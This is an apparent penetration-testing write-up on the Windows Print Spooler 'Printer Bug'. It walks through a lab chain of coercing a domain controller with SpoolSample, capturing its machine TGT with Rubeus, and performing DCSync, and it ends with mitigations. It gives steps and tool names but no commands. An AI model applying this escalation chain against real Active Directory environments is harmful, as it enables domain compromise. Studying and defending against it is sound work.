Printer Bug
Definition
Printer Bug is referred to as a configuration that is abused by adversaries present in Windows Print System Remote Protocol (MS-RPRN) where an adversary with a domain user account can use the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification method to force any machine running the Spooler service to authenticate to an attacker-controlled machine (that has unconstrained delegation) via Kerberos or NTLM. Thus capturing the machine account's TGT.
Theory & Background
According to Microsoft Docs, it is based on the Remote Procedure Call (RPC) protocol that supports synchronous printing and spooling operations between a client and server, including print job control and print system management.
The Above flow can be found at this link.
This abuse only executes the first 2 methods (RpcOpenPrinter and RpcRemoteFindFirstPrinterChangeNotificationEx) and stops after the notification method returns a nonzero windows error code. An initial connection between the target (printer server) and the attacker's machine (unconstrained server) only needed for "Printer Bug". When the RpcOpenPrinter method is executed, it needs to return an ERROR_SUCCESS value.
Forest Trusts
Trust is a relationship is established between domains that enable users of one domain to access the resources/services of another domain. There are two categories of trust:
Default Trusts
Other Trusts
Default Trusts
When a new domain is added to the root domain, two-way transitive trusts are created by default.
Other Trusts
This contains the list of trusts which are explicitly created by the domain admin.
While considering the printer bug, we would be considering only domains/forests with two-way trust between them.
Abuse
After compromising the machine that as Unconstrained Delegation, the attacker might compromise the Domain Controller present in the same domain / different domain(Child-Parent Relationship & Forest with bi-directional trust) through abusing this printer bug.
My Lab environment for this lab is:
sqlsvr.redwolf.local - Machine on which we have access and that has unconstrained delegation configured
redwolf-dc.redwolf.local - Domain Controller of the domain redwolf.local.
flab-dc.flab.redwolf.local - Domain Controller of the child domain flab.redwolf.local.
Execution Flow
Attacker compromises a system that has unconstrained delegation configured.
Attacker finds a potential system (mostly DCs) that can be abused.
Attacker uses MS-RPN to force the system for authenticating to the attacker-controlled machine.
This is done via RPC API : RpcRemoteFindFirstPrinterChangeNotification that allows print clients to subscribe to notifications of changes on the print server.
Once this API is called, the target system attempts to authenticate to the compromised host and Machine account's TGT is captured
Attacker gets the TGT of the machine account and impersonates in the domain for escalating the privilges.
We can check if a spool service is running on a target host like so:
If the spoolss was not running, we would receive an error.
Use Rubeus to start monitoring mode to capture the TGT, you can also use mimikatz to dump the cached TGTs.
SpoolSample by @tifkin_, can be used for exploiting printer bug. We execute it with two arguments target (DC with spoolss running on it) and server (Unconstrained Delegation Configured).
Once TGT is captured we can use the TGT to escalate the privileges. Again i will be using Rubeus for this purpose.
Since we have injected FLAB-DC$'s TGT into the lsass. we can now perform DCSync Attack
Mitigation:
Domain Controllers and AD admin systems need to have the Print Spooler service disabled. It is recommended to do this via GPO.
Remove unconstrained delegation from accounts and replace with constrained delegation (Domain Controllers have unconstrained delegation enabled by default).
References:
Last updated
